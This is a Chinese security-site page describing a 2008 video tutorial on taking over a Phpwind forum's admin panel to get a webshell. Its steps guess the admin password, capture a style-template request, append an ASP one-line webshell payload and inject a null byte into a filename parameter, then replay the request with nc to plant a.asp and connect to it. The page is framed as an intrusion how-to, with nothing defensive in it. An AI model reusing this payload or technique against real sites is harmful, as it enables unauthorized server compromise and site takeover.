安全中国首页 > 动画中心 > Phpwind动画找动画,点这里
 

Phpwind后台拿Shell

 
动画大小: 10.0 MB
添加时间: 2008-07-19
动画性质: 无声演示
录制工具: 屏幕录象专家
游戏外挂: Wg.anqn.com
VIP 会员: VIP.anqn.com
动画评级:
动画介绍:默认登陆页面是 /admin.php

社会工程学猜解默认用户

admin bbs17379

进后台了,不过也没什么上传的地方,就算有,PHP过滤相对于ASP的话还是严得多的。

于是想起以前论坛某牛人的话。

工具:

nc

WSE06b1

Uedit32

风格插件

风格模版

新建一个模版

提交的时候开始抓包

卡住了。

添加风格完成,请速到images目录下建立acaspa并放上相应的图片

抓到的包分两段。

编辑第二段包b.txt

下面是一句话小马。ASP的。密码1

在最后面加下面的小马

[回车]<%eval request("1")%>

action=add&step=3&sid=&setting%5B0%5D=acaspa

第三个参数修改一下。把最后的a改成十六进制的00,跟以前动网的漏洞好像原理一样吧。只是没

想到PHP也有这样的漏洞。C改成.改好后合并,并将其提交数据值改成B的大小。

UE上场。

用NC提交了。

<table width=55% align=center cellspacing=0 cellpadding=4>
<tr><td align=center valign=middle colspan=2><br><br><br>
添加风格完成,请速到images目录下建立a.asp\0并放上相应的图片<br>

嘿嘿。提交完成了。看看效果吧。

一片黑白。呵呵,上传成功了。文件存在。试试连接。

模版生成的目录/data/style/a.asp

测试测试

成功得PHPSHELL

下载地址: 安全中国anqn.com下载

 
安全中国网友投稿专用上传FTP空间:
Ftp服务器:www.anqn.com
Ftp端口:21
用户名:anqn
密 码:anqn.com
 
相关动画
 
学习软件编程开发技术,推荐加入以下软件编程培训班:
易语言软件编程培训班(简单易学)  Delphi软件编程培训班  VC++软件编程培训班
VB软件编程培训班  JAVA高端编程就业研发班

学习网站开发制作技术,推荐加入以下网站开发培训班:
ASP.net网站开发项目实战班  ASP语言网站建设培训班

学习网络安全入侵防护技术,推荐加入以下技术培训班:
大型网络安全入侵防护班  网站脚本程序全方位安全检测班

学习网络管理、网吧运营维护技术(网管),推荐加入以下培训班:
大型网吧技术管理人才特训班  Linux网络嵌入架构工程师培训班

学习专项特殊技术,推荐加入以下专项技术培训班:
软件与游戏外挂脱壳破解班(逆向工程)  赚钱王道-网赚技能培训班  Flash动画设计师就业特训班